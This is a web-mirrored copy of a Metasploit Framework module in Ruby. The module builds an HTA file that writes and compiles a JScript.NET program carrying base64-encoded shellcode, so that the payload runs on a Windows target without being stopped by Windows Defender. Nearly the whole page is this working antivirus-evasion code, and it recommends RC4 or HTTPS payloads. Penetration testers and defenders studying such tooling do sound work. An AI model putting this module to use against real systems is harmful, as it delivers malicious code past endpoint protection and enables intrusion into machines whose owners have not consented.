Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/windows_defender_js_hta.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Evasion
7
8
def initialize(info = {})
9
super(
10
merge_info(
11
info,
12
'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',
13
'Description' => %q{
14
This module will generate an HTA file that writes and compiles a JScript.NET file
15
containing shellcode on the target machine. After compilation, the generated EXE will
16
execute the shellcode without interference from Windows Defender.
17
18
It is recommended that you use a payload that uses RC4 or HTTPS for best experience.
19
},
20
'Author' => [
21
'sinmygit', # PoC
22
'Shelby Pace' # Metasploit Module
23
],
24
'License' => MSF_LICENSE,
25
'Platform' => 'win',
26
'Arch' => ARCH_X64,
27
'Targets' => [ [ 'Microsoft Windows', {} ] ]
28
)
29
)
30
31
register_options([
32
OptString.new(
33
'FILENAME',
34
[
35
true,
36
'Filename for the evasive file (default: random)',
37
"#{Rex::Text.rand_text_alpha(3..10)}.hta"
38
]
39
)
40
])
41
end
42
43
def run
44
# This is used in the ERB template
45
file_payload = Rex::Text.encode_base64(payload.encoded)
46
evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')
47
jsnet_code = File.read(evasion_shellcode_path)
48
fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exist?(evasion_shellcode_path)
49
js_file = ERB.new(jsnet_code).result(binding)
50
jsnet_encoded = Rex::Text.encode_base64(js_file)
51
# This is used in the ERB template
52
fname = Rex::Text.rand_text_alpha(6)
53
arch = ['x86', 'x64'].include?(payload.arch.first) ? payload.arch.first : 'anycpu'
54
hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
55
hta = File.read(hta_path)
56
fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)
57
hta_file = ERB.new(hta).result(binding)
58
file_create(hta_file)
59
end
60
end
61
62